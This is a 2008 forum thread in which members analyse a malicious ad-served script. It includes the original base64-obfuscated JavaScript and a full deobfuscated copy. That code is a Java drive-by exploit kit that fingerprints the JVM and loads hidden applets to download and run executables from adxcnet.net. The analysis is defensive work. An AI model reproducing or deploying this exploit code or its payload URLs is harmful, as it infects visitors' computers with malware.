Author Topic: Anybody know what this does? (2)  (Read 9201 times)

0 Members and 1 Guest are viewing this topic.

August 02, 2008, 10:49:25 pm
Read 9201 times

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Series of scripts/iframes:

http://freehomepages.com/astronomie/inceputuri.html
http://creative.clicksor.com/46821/c1067162256.html
http://especialads.com/banner/show.php?cid=1164623&tid=5014218916&sv=180x150

From: http://adxcnet.net/code/smain.php?scout=jvcxeng

Code: [Select]
<script language="javascript">
var chrstr = "ABCDEFG"+"HIJKLMNO"+"PQRSTUVWXYZabcdef"+"ghijklmnopqrstuvwxyz0123456789+/";
function sdf718d(ecstr1718) { var bits; var dcot=""; var i=0; for(i=0;i<ecstr1718.length;i+=4) { bits = (chrstr.indexOf(ecstr1718.charAt(i)) & 0xff) <<18 | (chrstr.indexOf(ecstr1718.charAt(i +1)) & 0xff) <<12 | (chrstr.indexOf(ecstr1718.charAt(i +2)) & 0xff) << 6 | chrstr.indexOf(ecstr1718.charAt(i +3)) & 0xff; dcot += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(ecstr1718.charCodeAt(i -2) == 61) { return(dcot.substring(0, dcot.length -2)); } else if(ecstr1718.charCodeAt(i -1) == 61) { return(dcot.substring(0, dcot.length -1)); } else {return(dcot)};}
document.write(sdf718d(unescape("LS0t"+"DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPg0KaWYobmF2aWdhdG9yLmphdmFFbmFibGVkKCkpIHsNCg0KdmFyIGp2bW1zdm0sIGp2bXNlYywganZtdXNhZmUsIGp2bWlwcm9jOw0KdmFyIGk9MDsgdmFyIHg9MDsgdmFyIHo9MDsNCmlmKG5hdmlnYXRvci5hcHBOYW1lLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigibWljcm9zb2Z0IikgIT0gLTEpIHsNCg0KLy8gR2V0IENsaWVudGNhcHMgdmVyc2lvbg0KdHJ5IHsNCm9DbGllbnRDYXBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7DQpvQ2xpZW50Q2Fwcy5zdHlsZS5iZWhhdmlvciA9ICJ1cmwoI2RlZmF1bHQjY2xpZW50Q2FwcykiOyANCn1jYXRjaChlKXt9DQoNCmZ1bmN0aW9uIEdldFZlcnNpb24oQ0xTSUQpIHsgdHJ5IHsNCmlmKG9DbGllbnRDYXBzLmlzQ29tcG9uZW50SW5zdGFsbGVkKENMU0lELCJDb21wb25lbnRJRCIpKSB7IA0KcmV0dXJuIG9DbGllbnRDYXBzLmdldENvbXBvbmVudFZlcnNpb24oQ0xTSUQsIkNvbXBvbmVudElEIikuc3BsaXQoIiwiKTsNCn0gZWxzZSB7IHJldHVybiBBcnJheSgwLDAsMCwwKTsgfQ0KfWNhdGNoKGUpe30gfQ0KICAgICAgIA0KdmFyIGp2b2MgID0gR2V0VmVyc2lvbigiezA4QjBFNUMwLTRGQ0ItMTFDRi1BQUE1LTAwNDAxQzYwODUwMH0iKTsgDQoNCi8vIEdldCBKYXZhQXBwbGV0IHZlcnNpb24NCnZhciBqdm12ZXJtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiYXBwbGV0Iik7DQpqdm12ZXJtLmFyY2hpdmUgPSAianZtdmVycy5qYXIiOw0KanZtdmVybS5jb2RlID0gInZtYWluLmNsYXNzIjsNCmp2bXZlcm0ud2lkdGggPSAiMSI7IGp2bXZlcm0uaGVpZ2h0ID0gIjEiOw0KZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChqdm12ZXJtKTsNCg0KDQovL3dpbmRvdy5vbmxvYWQgPSBkZWZpbmVtc207DQpmdW5jdGlvbiBqdmxvYWRjKCkgeyBpID0gaSsxOw0KaWYoanZtdmVybS5qdmVyc2lvbiB8fCAodHlwZW9mIGp2bXZlcm0uanZlcnNpb24gIT0gInVuZGVmaW5lZCIpKSB7IGRlZmluZW1zbSgpOyB9DQplbHNlIGlmKGkgPCAzMCkgeyBzZXRUaW1lb3V0KCJqdmxvYWRjKCkiLCAzMDApOyB9DQp9IHNldFRpbWVvdXQoImp2bG9hZGMoKSIsIDMwMCk7DQoNCmZ1bmN0aW9uIGRlZmluZW1zbSgpIHsgdHJ5IHsNCnZhciBqdmptLCBqdmp2LCBqdmphLCBzam1zanZtLCBzanNlY21uLCBzanVzYWZlLCBzamlwcm9jOw0KdHJ5eyBqdmptID0ganZtdmVybS5qdmVyc2lvbisiIjsganZqdiA9IGp2bXZlcm0uanZlbmRvcisiIjsgfWNhdGNoKGUpe30NCmlmKGp2am0uaW5kZXhPZigiLiIpID09IC0xKSB7IGp2amEgPSBmYWxzZTsgfSBlbHNlIHsganZqYSA9IGp2am0uc3BsaXQoIi4iKTsgfQ0KaWYoIWp2amEpIHsganZqYSA9IEFycmF5KDAsMCwiMF8wIik7IH0NCnZhciBqdmphcyA9IGp2amFbMl0uc3BsaXQoIl8iKTsNCmlmKChqdm9jWzBdIT0wKSAmJiAoanZvY1syXTwzODEwKSAmJiAoKGp2amFbMV08MikgfHwgKGp2amFbMF09PTApKSAmJiAoanZqdi5pbmRleE9mKCJNaWNyb3NvZnQiKSAhPSAtMSkpIHsgc2ptc2p2bSA9IHRydWU7IH0gZWxzZSB7IHNqbXNqdm0gPSBmYWxzZTsgfQ0KaWYoKGp2amFbMF0hPTApICYmICgoKGp2amFbMV08PTQpICYmIChqdmphc1swXTw9MikgJiYgKGp2amFzWzFdPDA2KSkgfHwgKGp2amFbMV08PTMpKSkgeyBzanNlY21uID0gdHJ1ZTsgfSBlbHNlIHsgc2pzZWNtbiA9IGZhbHNlOyB9DQppZigoanZqYVswXSE9MCkgJiYgKCgoanZqYVsxXTw9NSkgJiYgKGp2amFzWzBdPT0wKSAmJiAoanZqYXNbMV08MikpIHx8IChqdmphWzFdPD00KSkpIHsgc2p1c2FmZSA9IHRydWU7IH0gZWxzZSB7IHNqdXNhZmUgPSBmYWxzZTsgfQ0KLy9pZigoanZqYVswXSE9MCkgJiYgKCgoanZqYVsxXTw9NSkgJiYgKGp2amFzWzBdPT0wKSAmJiAoanZqYXNbMV08MTApKSB8fCAoanZqYVsxXTw9NCkpKSB7IHNqaXByb2MgPSB0cnVlOyB9IGVsc2UgeyBzamlwcm9jID0gZmFsc2U7IH0NCmlmKChqdmphWzBdIT0wKSAmJiAoKChqdmphWzFdPT01KSAmJiAoanZqYXNbMF09PTApICYmIChqdmphc1sxXTwxMCkpIHx8ICgoanZqYVsxXT09NCkgJiYgKGp2amFzWzBdPT0yKSAmJiAoanZqYXNbMV0+NSkgJiYgKGp2amFzWzFdPDEzKSkpKSB7IHNqaXByb2MgPSB0cnVlOyB9IGVsc2UgeyBzamlwcm9jID0gZmFsc2U7IH0NCnByaW50amFtZXRoKGp2amEsIHNqbXNqdm0sIHNqc2VjbW4sIHNqdXNhZmUsIHNqaXByb2MpOw0KfWNhdGNoKGUpe30gfQ0KDQp9IGVsc2UgeyANCi8vIE5vbiBpZSBicm93c2Vycw0KDQovLyBHZXQgU2NyaXB0IHZlcnNpb24NCnRyeSB7DQp2YXIganZqcyA9IGphdmEubGFuZy5TeXN0ZW0uZ2V0UHJvcGVydHkoImphdmEudmVyc2lvbiIpKyIiOw0KaWYoanZqcy5pbmRleE9mKCIuIikgPT0gLTEpIHsganZqcyA9IGZhbHNlOyB9IGVsc2UgeyBqdmpzID0ganZqcy5zcGxpdCgiLiIpOyB9DQp9Y2F0Y2goZSkge30NCg0KLy8gR2V0IFBsdWdpbiB2ZXJzaW9uDQppZigoIWp2anMpICYmIG5hdmlnYXRvci5wbHVnaW5zWyJKYXZhIFBsdWctaW4iXSkgeyB0cnkgew0KdmFyIGpwZCA9IG5hdmlnYXRvci5wbHVnaW5zWyJKYXZhIFBsdWctaW4iXS5kZXNjcmlwdGlvbjsNCnZhciBqdmpzID0ganBkLnN1YnN0cmluZyhqcGQuaW5kZXhPZigiMSIpLGpwZC5pbmRleE9mKCIgIiwganBkLmluZGV4T2YoIjEiKSkpOw0KaWYoanZqcy5pbmRleE9mKCIuIikgPT0gLTEpIHsganZqcyA9IGZhbHNlOyB9IGVsc2UgeyBqdmpzID0ganZqcy5zcGxpdCgiLiIpOyB9DQp9Y2F0Y2goZSkge30gfQ0KDQovLyBHZXQgSmF2YUFwcGxldCBWZXJzaW9uDQppZighanZqcykgeyANCnZhciBqdm12ZXJmID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiYXBwbGV0Iik7DQpqdm12ZXJmLmFyY2hpdmUgPSAianZtdmVycy5qYXIiOw0KanZtdmVyZi5jb2RlID0gInZtYWluLmNsYXNzIjsNCmp2bXZlcmYud2lkdGggPSAiMSI7IGp2bXZlcmYuaGVpZ2h0ID0gIjEiOw0KZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChqdm12ZXJmKTsNCn0NCg0KaWYoIWp2anMpIHsgDQpmdW5jdGlvbiBqdmxvYWRmYygpIHsgaSA9IGkrMTsNCmlmKGp2bXZlcmYuanZlcnNpb24pIHsgZGVmaW5lZmZtKCk7IH0NCmVsc2UgaWYoaSA8IDMwKSB7IHNldFRpbWVvdXQoImp2bG9hZGZjKCkiLCAzMDApOyB9DQp9IHNldFRpbWVvdXQoImp2bG9hZGZjKCkiLCAzMDApOw0KfSBlbHNlIHsgc2V0VGltZW91dCgiZGVmaW5lZmZtKCkiLCAxMDApOyB9DQoNCmZ1bmN0aW9uIGRlZmluZWZmbSgpIHsgdHJ5IHsNCnZhciBzam1zanZtLCBzanNlY21uLCBzanVzYWZlLCBzamlwcm9jOw0KaWYoIWp2anMpIHsgdHJ5eyB2YXIganZqaiA9IGp2bXZlcmYuanZlcnNpb24rIiI7IGp2anMgPSBqdmpqLnNwbGl0KCIuIik7IH1jYXRjaChlKSB7fSB9DQppZihqdmpzKSB7DQp2YXIganZqc3MgPSBqdmpzWzJdLnNwbGl0KCJfIik7DQppZigoanZqc1swXSE9MCkgJiYgKGp2anNbMV08MikpIHsgdmFyIHNqbXNqdm0gPSB0cnVlOyB9IGVsc2UgeyBzam1zanZtID0gZmFsc2U7IH0NCmlmKChqdmpzWzBdIT0wKSAmJiAoKChqdmpzWzFdPD00KSAmJiAoanZqc3NbMF08PTIpICYmIChqdmpzc1sxXTwwNikpIHx8IChqdmpzWzFdPD0zKSkpIHsgc2pzZWNtbiA9IHRydWU7IH0gZWxzZSB7IHNqc2VjbW4gPSBmYWxzZTsgfQ0KaWYoKGp2anNbMF0hPTApICYmICgoKGp2anNbMV08PTUpICYmIChqdmpzc1swXT09MCkgJiYgKGp2anNzWzFdPDIpKSB8fCAoanZqc1sxXTw9NCkpKSB7IHNqdXNhZmUgPSB0cnVlOyB9IGVsc2UgeyBzanVzYWZlID0gZmFsc2U7IH0NCi8vaWYoKGp2anNbMF0hPTApICYmICgoKGp2anNbMV08PTUpICYmIChqdmpzc1swXT09MCkgJiYgKGp2anNzWzFdPDEwKSkgfHwgKGp2anNbMV08PTQpKSkgeyBzamlwcm9jID0gdHJ1ZTsgfSBlbHNlIHsgc2ppcHJvYyA9IGZhbHNlOyB9DQppZigoanZqc1swXSE9MCkgJiYgKCgoanZqc1sxXT09NSkgJiYgKGp2anNzWzBdPT0wKSAmJiAoanZqc3NbMV08MTApKSB8fCAoKGp2anNbMV09PTQpICYmIChqdmpzc1swXT09MikgJiYgKGp2anNzWzFdPjUpICYmIChqdmpzc1sxXTwxMykpKSkgeyBzamlwcm9jID0gdHJ1ZTsgfSBlbHNlIHsgc2ppcHJvYyA9IGZhbHNlOyB9DQpwcmludGphbWV0aChqdmpzLCBzam1zanZtLCBzanNlY21uLCBzanVzYWZlLCBzamlwcm9jKTsNCn0NCn1jYXRjaChlKSB7fSB9DQoNCg0KfSAvLyBFbmQgRWxzZSBOb3QgSUUNCg0KDQpmdW5jdGlvbiBwcmludGphbWV0aChqdmVycywgc2ptc2p2bSwgc2pzZWNtbiwgc2p1c2FmZSwgc2ppcHJvYykgeyB0cnkgew0KLy9hbGVydCgiSlZFUlNJT046ICIranZlcnMrIiBNU0pWTTogIitzam1zanZtKyIgU0VDTUFOOiAiK3Nqc2VjbW4rIiBVU0FGRTogIitzanVzYWZlKyIgSU1QUk86ICIrc2ppcHJvYyk7DQoNCmlmKHNqbXNqdm0pIHsNCmp2bW1zdm0gPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJhcHBsZXQiKTsNCmp2bW1zdm0uYXJjaGl2ZSA9ICJqdm1tc3ZtLmphciI7DQpqdm1tc3ZtLmNvZGUgPSAidm1haW4uY2xhc3MiOw0KanZtbXN2bS53aWR0aCA9ICIxIjsganZtbXN2bS5oZWlnaHQgPSAiMSI7DQp2YXIganZtbXN2cCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInBhcmFtIik7DQpqdm1tc3ZwLm5hbWUgPSAic2RhdGEiOw0KanZtbXN2cC52YWx1ZSA9ICJodHRwOi8vYWR4Y25ldC5uZXQveHJ1bi5leGU7aHR0cDovL2FkeGNuZXQubmV0L3hwcmUuZXhlIjsNCmp2bW1zdm0uYXBwZW5kQ2hpbGQoanZtbXN2cCk7DQpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGp2bW1zdm0pOw0KfQ0KDQppZihzanNlY21uKSB7DQpqdm1zZWMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJhcHBsZXQiKTsNCmp2bXNlYy5hcmNoaXZlID0gImp2bXNlY21hbi5qYXIiOw0KanZtc2VjLmNvZGUgPSAidm1haW4uY2xhc3MiOw0KanZtc2VjLndpZHRoID0gIjEiOyBqdm1zZWMuaGVpZ2h0ID0gIjEiOw0KZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChqdm1zZWMpOw0Kc2V0VGltZW91dCgic2p2c2VjYygpIiwgMzAwKTsNCn0NCg0KaWYoc2p1c2FmZSkgew0KanZtdXNhZmUgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJhcHBsZXQiKTsNCmp2bXVzYWZlLmFyY2hpdmUgPSAianZtdXNhZmUuamFyIjsNCmp2bXVzYWZlLmNvZGUgPSAidm1haW4uY2xhc3MiOw0KanZtdXNhZmUud2lkdGggPSAiMSI7IGp2bXVzYWZlLmhlaWdodCA9ICIxIjsNCmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoanZtdXNhZmUpOw0Kc2V0VGltZW91dCgic2p2dXNhZmMoKSIsIDMwMCk7DQp9DQoNCmlmKHNqaXByb2MpIHsNCmp2bWltcHJvID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiYXBwbGV0Iik7DQpqdm1pbXByby5hcmNoaXZlID0gImp2bWltcHJvLmphciI7DQpqdm1pbXByby5jb2RlID0gInZtYWluLmNsYXNzIjsNCmp2bWltcHJvLndpZHRoID0gIjEiOyBqdm1pbXByby5oZWlnaHQgPSAiMSI7DQpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGp2bWltcHJvKTsNCn0NCn1jYXRjaChlKSB7fSB9DQoNCg0KDQpmdW5jdGlvbiBzanZzZWNjKCkgeyB4ID0geCsxOw0KaWYodHlwZW9mIGp2bXNlYy5nZXRDbGFzcyAhPSAidW5kZWZpbmVkIikgeyBzanZtc2VjKCk7IH0NCmVsc2UgaWYoeCA8IDMwKSB7IHNldFRpbWVvdXQoInNqdnNlY2MoKSIsIDMwMCk7IH0NCn0NCg0KLy8gU0pfU0VDTUFOIElOVk9LRQ0KZnVuY3Rpb24gc2p2bXNlYygpIHsgdHJ5IHsNCnZhciBzZGE9Imh0dHA6Ly9hZHhjbmV0Lm5ldC94cnVuLmV4ZTtodHRwOi8vYWR4Y25ldC5uZXQveHByZS5leGUiOw0KdmFyIGNvbj1qdm1zZWMuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJzdW4ucGx1Z2luLmxpdmVjb25uZWN0LlNlY3VyZUludm9jYXRpb24iKTsNCnZhciBzeXM9anZtc2VjLmdldENsYXNzKCkuZm9yTmFtZSgiamF2YS5sYW5nLlN5c3RlbSIpOw0KdmFyIHNlYz1qdm1zZWMuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZhLmxhbmcuU2VjdXJpdHlNYW5hZ2VyIik7DQpqdm1zZWMubWFpbihjb24sIHN5cywgc2VjLCBzZGEpOw0KfSBjYXRjaChlKSB7fSB9DQoNCg0KDQpmdW5jdGlvbiBzanZ1c2FmYygpIHsgeiA9IHorMTsNCmlmKHR5cGVvZiBqdm11c2FmZS5nZXRDbGFzcyAhPSAidW5kZWZpbmVkIikgeyBzanZtdXNhZigpOyB9DQplbHNlIGlmKHogPCAzMCkgeyBzZXRUaW1lb3V0KCJzanZ1c2FmYygpIiwgMzAwKTsgfQ0KfQ0KDQovLyBTSl9VU0FGRSBJTlZPS0UNCmZ1bmN0aW9uIHNqdm11c2FmKCkgeyB0cnkgeyANCnZhciBzZGEgPSAiaHR0cDovL2FkeGNuZXQubmV0L3hydW4uZXhlO2h0dHA6Ly9hZHhjbmV0Lm5ldC94cHJlLmV4ZSI7DQp2YXIgdWNsID0ganZtdXNhZmUuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJzdW4ubWlzYy5VbnNhZmUiKTsgDQp2YXIgdW10ID0gdWNsLmdldE1ldGhvZCgiZ2V0VW5zYWZlIiwgbnVsbCk7IA0KdmFyIHVzZiA9IHVtdC5pbnZva2UodW10LCBudWxsKTsgDQpqdm11c2FmZS5tYWluKHVzZik7IA0KdmFyIGRjbCA9IHVzZi5kZWZpbmVDbGFzcygidmxvY2FsIiwganZtdXNhZmUuYmNsYXNzLCAwLCBqdm11c2FmZS5jbGFzc3N6KTsgDQp2YXIgZGNkID0gdXNmLmFsbG9jYXRlSW5zdGFuY2UoZGNsKTsgDQpkY2QudmxvYWQodXNmLCBzZGEpOw0KfSBjYXRjaChkKSB7fSB9IA0KDQoNCn0gIC8vIGVuZCBqYXZhZW5hYmxlZA0KPC9zY3JpcHQ+DQoNCg0KDQoNCg0K")));
</script>
 

adxcnet.net/code/jvmvers.jar
http://www.virustotal.com/analisis/e24c42aee3ba1bf602b8aa0def38b177

Both the script and that jar file have 0 detection on VT, but googling would show that it is probably malicious:
http://www.google.com/search?q=adxcnet.net

August 03, 2008, 06:02:38 am
Reply #1

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
There is more than one JAR file, it depends on browser version. You can also see a link to an exe in deobfuscated script.

Code: [Select]
<script language="javascript">
if(navigator.javaEnabled()) {

var jvmmsvm, jvmsec, jvmusafe, jvmiproc;
var i=0; var x=0; var z=0;
if(navigator.appName.toLowerCase().indexOf("microsoft") != -1) {

// Get Clientcaps version
try {
oClientCaps = document.createElement("div");
oClientCaps.style.behavior = "url(#default#clientCaps)";
}catch(e){}

function GetVersion(CLSID) { try {
if(oClientCaps.isComponentInstalled(CLSID,"ComponentID")) {
return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");
} else { return Array(0,0,0,0); }
}catch(e){} }
       
var jvoc  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

// Get JavaApplet version
var jvmverm = document.createElement("applet");
jvmverm.archive = "jvmvers.jar";
jvmverm.code = "vmain.class";
jvmverm.width = "1"; jvmverm.height = "1";
document.body.appendChild(jvmverm);


//window.onload = definemsm;
function jvloadc() { i = i+1;
if(jvmverm.jversion || (typeof jvmverm.jversion != "undefined")) { definemsm(); }
else if(i < 30) { setTimeout("jvloadc()", 300); }
} setTimeout("jvloadc()", 300);

function definemsm() { try {
var jvjm, jvjv, jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc;
try{ jvjm = jvmverm.jversion+""; jvjv = jvmverm.jvendor+""; }catch(e){}
if(jvjm.indexOf(".") == -1) { jvja = false; } else { jvja = jvjm.split("."); }
if(!jvja) { jvja = Array(0,0,"0_0"); }
var jvjas = jvja[2].split("_");
if((jvoc[0]!=0) && (jvoc[2]<3810) && ((jvja[1]<2) || (jvja[0]==0)) && (jvjv.indexOf("Microsoft") != -1)) { sjmsjvm = true; } else { sjmsjvm = false; }
if((jvja[0]!=0) && (((jvja[1]<=4) && (jvjas[0]<=2) && (jvjas[1]<06)) || (jvja[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<2)) || (jvja[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvja[0]!=0) && (((jvja[1]<=5) && (jvjas[0]==0) && (jvjas[1]<10)) || (jvja[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvja[0]!=0) && (((jvja[1]==5) && (jvjas[0]==0) && (jvjas[1]<10)) || ((jvja[1]==4) && (jvjas[0]==2) && (jvjas[1]>5) && (jvjas[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvja, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}catch(e){} }

} else {
// Non ie browsers

// Get Script version
try {
var jvjs = java.lang.System.getProperty("java.version")+"";
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {}

// Get Plugin version
if((!jvjs) && navigator.plugins["Java Plug-in"]) { try {
var jpd = navigator.plugins["Java Plug-in"].description;
var jvjs = jpd.substring(jpd.indexOf("1"),jpd.indexOf(" ", jpd.indexOf("1")));
if(jvjs.indexOf(".") == -1) { jvjs = false; } else { jvjs = jvjs.split("."); }
}catch(e) {} }

// Get JavaApplet Version
if(!jvjs) {
var jvmverf = document.createElement("applet");
jvmverf.archive = "jvmvers.jar";
jvmverf.code = "vmain.class";
jvmverf.width = "1"; jvmverf.height = "1";
document.body.appendChild(jvmverf);
}

if(!jvjs) {
function jvloadfc() { i = i+1;
if(jvmverf.jversion) { defineffm(); }
else if(i < 30) { setTimeout("jvloadfc()", 300); }
} setTimeout("jvloadfc()", 300);
} else { setTimeout("defineffm()", 100); }

function defineffm() { try {
var sjmsjvm, sjsecmn, sjusafe, sjiproc;
if(!jvjs) { try{ var jvjj = jvmverf.jversion+""; jvjs = jvjj.split("."); }catch(e) {} }
if(jvjs) {
var jvjss = jvjs[2].split("_");
if((jvjs[0]!=0) && (jvjs[1]<2)) { var sjmsjvm = true; } else { sjmsjvm = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=4) && (jvjss[0]<=2) && (jvjss[1]<06)) || (jvjs[1]<=3))) { sjsecmn = true; } else { sjsecmn = false; }
if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<2)) || (jvjs[1]<=4))) { sjusafe = true; } else { sjusafe = false; }
//if((jvjs[0]!=0) && (((jvjs[1]<=5) && (jvjss[0]==0) && (jvjss[1]<10)) || (jvjs[1]<=4))) { sjiproc = true; } else { sjiproc = false; }
if((jvjs[0]!=0) && (((jvjs[1]==5) && (jvjss[0]==0) && (jvjss[1]<10)) || ((jvjs[1]==4) && (jvjss[0]==2) && (jvjss[1]>5) && (jvjss[1]<13)))) { sjiproc = true; } else { sjiproc = false; }
printjameth(jvjs, sjmsjvm, sjsecmn, sjusafe, sjiproc);
}
}catch(e) {} }


} // End Else Not IE


function printjameth(jvers, sjmsjvm, sjsecmn, sjusafe, sjiproc) { try {
//alert("JVERSION: "+jvers+" MSJVM: "+sjmsjvm+" SECMAN: "+sjsecmn+" USAFE: "+sjusafe+" IMPRO: "+sjiproc);

if(sjmsjvm) {
jvmmsvm = document.createElement("applet");
jvmmsvm.archive = "jvmmsvm.jar";
jvmmsvm.code = "vmain.class";
jvmmsvm.width = "1"; jvmmsvm.height = "1";
var jvmmsvp = document.createElement("param");
jvmmsvp.name = "sdata";
jvmmsvp.value = "http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
jvmmsvm.appendChild(jvmmsvp);
document.body.appendChild(jvmmsvm);
}

if(sjsecmn) {
jvmsec = document.createElement("applet");
jvmsec.archive = "jvmsecman.jar";
jvmsec.code = "vmain.class";
jvmsec.width = "1"; jvmsec.height = "1";
document.body.appendChild(jvmsec);
setTimeout("sjvsecc()", 300);
}

if(sjusafe) {
jvmusafe = document.createElement("applet");
jvmusafe.archive = "jvmusafe.jar";
jvmusafe.code = "vmain.class";
jvmusafe.width = "1"; jvmusafe.height = "1";
document.body.appendChild(jvmusafe);
setTimeout("sjvusafc()", 300);
}

if(sjiproc) {
jvmimpro = document.createElement("applet");
jvmimpro.archive = "jvmimpro.jar";
jvmimpro.code = "vmain.class";
jvmimpro.width = "1"; jvmimpro.height = "1";
document.body.appendChild(jvmimpro);
}
}catch(e) {} }



function sjvsecc() { x = x+1;
if(typeof jvmsec.getClass != "undefined") { sjvmsec(); }
else if(x < 30) { setTimeout("sjvsecc()", 300); }
}

// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }



function sjvusafc() { z = z+1;
if(typeof jvmusafe.getClass != "undefined") { sjvmusaf(); }
else if(z < 30) { setTimeout("sjvusafc()", 300); }
}

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://adxcnet.net/xrun.exe;http://adxcnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }


}  // end javaenabled
</script>

I'll take a look at the JAR files now.

August 03, 2008, 06:15:47 am
Reply #2

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319
http://adxcnet.net/xrun.exe
http://adxcnet.net/xpre.exe

Mucho Malware---Lots of crapwareadwares.

Ill usually see these at a crack site as a banner or a pop up,once they hit,the s*it hits the fan hard.

August 03, 2008, 06:33:46 am
Reply #3

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
JAR files are used to determine JVM version (MS or Sun), to download and run a file that it will fetch from a URL passed as argument.

August 03, 2008, 02:46:41 pm
Reply #4

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964